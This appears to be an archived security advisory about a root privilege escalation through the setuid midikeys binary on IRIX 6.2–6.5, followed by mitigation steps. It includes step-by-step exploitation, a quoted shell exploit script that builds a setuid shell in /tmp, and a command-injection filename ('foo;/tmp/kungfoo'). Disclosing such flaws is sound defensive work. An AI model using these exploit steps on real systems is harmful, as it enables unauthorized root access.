COMMAND

    midikeys

SYSTEMS AFFECTED

    IRIX 6.2, 6.3, 6.5, 6.5.3

PROBLEM

    Larry W. Cashdollar  found following (tested  on IRIX64 devel  6.5
    05190004).  The  setuid root binary  midikeys can be  used to read
    any file on the  system using its gui  interface.  It can  also be
    used  to  edit  anyfile  on  the  system.   One can get from guest
    account access to root access using the following procedure.

    1) Choose an unpassworded account and telnet in (like guest or lp)

        devel 25% id
        uid=998 gid=998(guest)

    2) Execute the midikeys application with display set to your host

        devel 26% ./midikeys
        devel 27% Xlib:  extension "GLX" missing on display "grinch:0.0".
        Xlib:  extension "GLX" missing on display "grinch:0.0".

    3) under  the midikeys  window click  sounds and  then midi songs.
       This will open a file manager type interface.

    4) You can enter the path and filename of files you which to read.
       including root  owned with  group/world read/write  permissions
       unset.

    5) If  you select  a file  like "/usr/share/data/music/README"  it
       will appear  in a  text editor.   Use the  text editor  to open
       /etc/passwd and make modifications at will.  Save and enjoy.

    So, you can remove the '*' from sysadm...

        $ su sysadm
        # id
        uid=0(root) gid=0(sys)

        devel 28%  ls -l /usr/sbin/midikeys
        -rwsr-xr-x    1 root     root      218712 Jan 10 17:19 /usr/sbin/midikeys

    You just need an account to gain root priviliges; it's not limited
    to  the  unpassworded  accounts,  any  normal  user could use this
    exploit.   This was  verified to  work on  an O2  running IRIX 6.3
    (IRIX o2  6.3 O2  R10000 12161207  IP32) and  on an Octane running
    IRIX 6.5.3  (IRIX64 octane  6.5 6.5.3m  01221553 IP30).   It seems
    that whether  or not  you use  a vi  or some  other editor makes a
    difference.  So far,  with vi won't work,  but if you open  an X11
    editor (gvim), it will run as  root, and you will be able  to edit
    anything, again...   At the end,  it turns out  that one does  not
    need  any  particular  text  editor  to exploit the vulnerability.
    That's  because  of  a  nice  "feature" of the desktop environment
    variable WINEDITOR that  can be set  to any system  command, e.g.,
    "/bin/chmod 4755  /tmp/bsh" (where  /tmp/bsh is  just a root-owned
    copy of Bourne shell).  This  can be done on both irix  6.2 (e.g.,
    using  toolchest  ->  Desktop  ->  Customize  ->Desktop  ->Default
    Editor:   Other...)   and  on  irix  6.5  (toolchest -> Desktop ->
    Customize -> Utilities -> Text Editor:  Other...).  After  setting
    WINEDITOR    (which    can     be    verified    by     inspecting
    ~/.desktop-hostname/desktopenv)   the    exploit    follows    the
    well-known path by running midikeys, opening a file manager, etc.

    Similar  approach  to  exploit  this  vulnerability  was  given by
    Loneguard:

        #!/bin/sh
        #
        # Irix 6.x soundplayer xploit - Loneguard 20/02/99
        #
        # Good example of how bad coding in a non-setuid/priviledged process
        # can offer up rewt
        #
        cat > /tmp/crazymonkey.c << 'EOF'
        main() {
	        setuid(0);
	        system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
        }
        EOF
        cc -o /tmp/kungfoo crazymonkey.c
        /usr/sbin/midikeys &
        echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will bring up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"

    This works fine  on Irix 6.4  here... although some  people had to
    change csh to sh... csh returned permission denied, 4755 and  all.
    Problem here is that  various csh's won't run  setuid-root scripts
    unless you specify (I  think) the -b flag.   From the Solaris  csh
    man page:

    ...
         -b        Force a "break" from option processing. Subsequent
                   command  line  arguments  are not interpreted as C
                   shell options. This allows the passing of  options
                   to  a script without confusion. The shell does not
                   run set-user-ID  or  set-group-ID  scripts  unless
                   this option is present.
    ...

    then again, maybe it was done deliberately to foil script kiddies.

SOLUTION

    Unpassworded account?  That's a known (and documented) feature  on
    IRIX systems.   First thing you  do when you  unpack an IRIX  box:
    set  a  root  password  and  disable  the  open accounts (EZsetup,
    OutOfBox, lp, guest, 4Dgifts, sgiweb).   There's even an entry  in
    the "System manager" to do it.  Remove suid bit.

    After a chmod u-s midikeys, midikeys still works, at least after a
    very  quick  test.   However,  removal  of  the  setuid permission
    disables functionality that is not implemented or utilized at this
    time.  So,

        % ls -la /usr/sbin/midikeys
        -rwsr-xr-x 1 root sys  218712 Mar  8 14:57 /usr/sbin/midikeys

        % /bin/su -
        #

        # /bin/chmod 555 /usr/sbin/midikeys

        # ls -la /usr/sbin/midikeys
        -r-xr-xr-x 1 root sys  218712 May  20 13:57 /usr/sbin/midikeys